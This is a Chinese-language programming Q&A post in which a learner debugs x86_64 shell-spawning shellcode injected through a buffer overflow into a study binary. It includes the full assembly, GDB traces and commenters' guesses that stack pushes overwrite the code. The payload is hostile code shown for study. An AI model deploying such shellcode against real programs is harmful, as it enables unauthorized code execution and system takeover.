【发布时间】:2020-11-30 15:46:50
【问题描述】:
编写了一个简单的 x86_64 shellcode:
BITS 64
xor rax, rax
push rax
push 0x68732f6e
push 0x69622f2f
mov rbx, rsp
push rax
mov rdx, rsp
push rbx
mov rcx, rsp
mov al, 221
int 0x80
通过缓冲区溢出,shellcode 被发送到处理器。一切顺利,直到执行完最后的第三条指令(push rbx)。然后程序捕获 SIGSEGV 并且永远不会到达珍贵的中断 - int 0x80。我想可能是堆栈溢出了,我在 shellcode 的开头插入了几个弹出指令。结果,SIGSEGV 在同一条指令上更改为 SIGILL - push rbx。根本没有任何想法。 GDB:
=> 0x7fffffffea72: mov rdx,rsp
0x7fffffffea75: push rbx
0x7fffffffea76: mov rcx,rsp
0x7fffffffea79: mov al,0xdd
0x7fffffffea7b: int 0x80
0x7fffffffea7d: (bad)
0x7fffffffea7e: (bad)
0x7fffffffea7f: inc DWORD PTR [rax]
-----------------------------------------------------------------------------------------------------------------------------
0x00007fffffffea72 in ?? ()
gdb$ n
-----------------------------------------------------------------------------------------------------------------------[regs]
RAX: 0x0000000000000000 RBX: 0x00007FFFFFFFEA88 RBP: 0xFFFFFFFFFFFFFFFF RSP: 0x00007FFFFFFFEA80 o d I t s Z a P c
RDI: 0x00007FFFFFFFEA60 RSI: 0x0000555555556021 RDX: 0x00007FFFFFFFEA80 RCX: 0x60FFFFFFFFFFFFFF RIP: 0x00007FFFFFFFEA75
R8 : 0x0000000000000000 R9 : 0x00007FFFF7FE14C0 R10: 0xFFFFFFFFFFFFF8F5 R11: 0x00007FFFF7E54B60 R12: 0x0000555555555060
R13: 0x0000000000000000 R14: 0x0000000000000000 R15: 0x0000000000000000
CS: 0033 DS: 0000 ES: 0000 FS: 0000 GS: 0000 SS: 002B
-----------------------------------------------------------------------------------------------------------------------[code]
=> 0x7fffffffea75: push rbx
0x7fffffffea76: mov rcx,rsp
0x7fffffffea79: mov al,0xdd
0x7fffffffea7b: int 0x80
0x7fffffffea7d: (bad)
0x7fffffffea7e: (bad)
0x7fffffffea7f: inc DWORD PTR [rax]
0x7fffffffea81: add BYTE PTR [rax],al
-----------------------------------------------------------------------------------------------------------------------------
0x00007fffffffea75 in ?? ()
gdb$ n
Program received signal SIGSEGV, Segmentation fault.
-----------------------------------------------------------------------------------------------------------------------[regs]
RAX: 0x0000000000000000 RBX: 0x00007FFFFFFFEA88 RBP: 0xFFFFFFFFFFFFFFFF RSP: 0x00007FFFFFFFEA78 o d I t s Z a P c
RDI: 0x00007FFFFFFFEA60 RSI: 0x0000555555556021 RDX: 0x00007FFFFFFFEA80 RCX: 0x60FFFFFFFFFFFFFF RIP: 0x00007FFFFFFFEA76
R8 : 0x0000000000000000 R9 : 0x00007FFFF7FE14C0 R10: 0xFFFFFFFFFFFFF8F5 R11: 0x00007FFFF7E54B60 R12: 0x0000555555555060
R13: 0x0000000000000000 R14: 0x0000000000000000 R15: 0x0000000000000000
CS: 0033 DS: 0000 ES: 0000 FS: 0000 GS: 0000 SS: 002B
信息过程映射:
gdb$ info proc mappings
process 3025
Mapped address spaces:
Start Addr End Addr Size Offset objfile
0x555555554000 0x555555555000 0x1000 0x0 /home/yagur/Hacking.exploits.study/exploits/buffer_overflow.bin
0x555555555000 0x555555556000 0x1000 0x1000 /home/yagur/Hacking.exploits.study/exploits/buffer_overflow.bin
0x555555556000 0x555555557000 0x1000 0x2000 /home/yagur/Hacking.exploits.study/exploits/buffer_overflow.bin
0x555555557000 0x555555558000 0x1000 0x2000 /home/yagur/Hacking.exploits.study/exploits/buffer_overflow.bin
0x555555558000 0x555555559000 0x1000 0x3000 /home/yagur/Hacking.exploits.study/exploits/buffer_overflow.bin
0x7ffff7dbb000 0x7ffff7dbd000 0x2000 0x0
0x7ffff7dbd000 0x7ffff7de3000 0x26000 0x0 /usr/lib/libc-2.32.so
0x7ffff7de3000 0x7ffff7f30000 0x14d000 0x26000 /usr/lib/libc-2.32.so
0x7ffff7f30000 0x7ffff7f7c000 0x4c000 0x173000 /usr/lib/libc-2.32.so
0x7ffff7f7c000 0x7ffff7f7f000 0x3000 0x1be000 /usr/lib/libc-2.32.so
0x7ffff7f7f000 0x7ffff7f82000 0x3000 0x1c1000 /usr/lib/libc-2.32.so
0x7ffff7f82000 0x7ffff7f88000 0x6000 0x0
0x7ffff7fca000 0x7ffff7fce000 0x4000 0x0 [vvar]
0x7ffff7fce000 0x7ffff7fd0000 0x2000 0x0 [vdso]
0x7ffff7fd0000 0x7ffff7fd2000 0x2000 0x0 /usr/lib/ld-2.32.so
0x7ffff7fd2000 0x7ffff7ff3000 0x21000 0x2000 /usr/lib/ld-2.32.so
0x7ffff7ff3000 0x7ffff7ffc000 0x9000 0x23000 /usr/lib/ld-2.32.so
0x7ffff7ffc000 0x7ffff7ffd000 0x1000 0x2b000 /usr/lib/ld-2.32.so
0x7ffff7ffd000 0x7ffff7fff000 0x2000 0x2c000 /usr/lib/ld-2.32.so
0x7ffffffde000 0x7ffffffff000 0x21000 0x0 [stack]
0xffffffffff600000 0xffffffffff601000 0x1000 0x0 [vsyscall]
gdb$
New question: Changed the shellcode to the following:
BITS 64
pop rax
pop rax
pop rax
pop rax
xor rax, rax
push rax
push 0x68732f6e
push 0x69622f2f
mov rbx, rsp
push rax
mov rdx, rsp
push rbx
mov rcx, rsp
mov al, 221
int 0x80
通过这样做,我可以防止我的 shellcode 被覆盖。结果:
gdb$ ni
--------------------------------------------------------------------------
---------------------------------------------[regs]
RAX: 0x0000000000000000 RBX: 0x00007FFFFFFFEAA8 RBP: 0xFFFFFFFFFFFFFFFF RSP:
0x00007FFFFFFFEAA0 o d I t s Z a P c
RDI: 0x00007FFFFFFFEA60 RSI: 0x0000555555556021 RDX: 0x00007FFFFFFFEAA0 RCX:
0x60FFFFFFFFFFFFFF RIP: 0x00007FFFFFFFEA79
R8 : 0x0000000000000000 R9 : 0x00007FFFF7FE14C0 R10: 0xFFFFFFFFFFFFF8F5 R11:
0x00007FFFF7E54B60 R12: 0x0000555555555060
R13: 0x0000000000000000 R14: 0x0000000000000000 R15: 0x0000000000000000
CS: 0033 DS: 0000 ES: 0000 FS: 0000 GS: 0000 SS: 002B
--------------------------------------------------------------------------
---------------------------------------------[code]
=> 0x7fffffffea79: push rbx
0x7fffffffea7a: mov rcx,rsp
0x7fffffffea7d: mov al,0xdd
0x7fffffffea7f: int 0x80
0x7fffffffea81: (bad)
0x7fffffffea82: (bad)
0x7fffffffea83: (bad)
0x7fffffffea84: (bad)
--------------------------------------------------------------------------------
---------------------------------------------
0x00007fffffffea79 in ?? ()
gdb$ ni
Program received signal SIGILL, Illegal instruction.
--------------------------------------------------------------------------
---------------------------------------------[regs]
RAX: 0xFFFFFFFFFFFFFFF7 RBX: 0x00007FFFFFFFEAA8 RBP: 0xFFFFFFFFFFFFFFFF RSP:
0x00007FFFFFFFEA98 o d I t s Z a P c
RDI: 0x00007FFFFFFFEA60 RSI: 0x0000555555556021 RDX: 0x00007FFFFFFFEAA0 RCX:
0x00007FFFFFFFEA98 RIP: 0x00007FFFFFFFEA81
R8 : 0x0000000000000000 R9 : 0x00007FFFF7FE14C0 R10: 0xFFFFFFFFFFFFF8F5 R11:
0x00007FFFF7E54B60 R12: 0x0000555555555060
R13: 0x0000000000000000 R14: 0x0000000000000000 R15: 0x0000000000000000
CS: 0033 DS: 0000 ES: 0000 FS: 0000 GS: 0000 SS: 002B
--------------------------------------------------------------------------
---------------------------------------------[code]
=> 0x7fffffffea81: (bad)
0x7fffffffea82: (bad)
0x7fffffffea83: (bad)
0x7fffffffea84: (bad)
0x7fffffffea85: (bad)
0x7fffffffea86: (bad)
0x7fffffffea87: (bad)
0x7fffffffea88: (bad)
--------------------------------------------------------------------------------
---------------------------------------------
0x00007fffffffea81 in ?? ()
gdb$
【问题讨论】:
-
如果您正在使用 gef,您能否包含
vmmap的输出,如果您不是,您能否包含info proc mappings的输出? -
可以,但请包含
info proc mappings的输出。 -
您的 shellcode 在堆栈中,很可能会被推送覆盖。
-
我添加了 info proc 映射
-
小丑,这怎么可能?毕竟,堆栈从地址增长到最小地址。 push 指令不应该覆盖 shellcode
标签: linux assembly x86-64 shellcode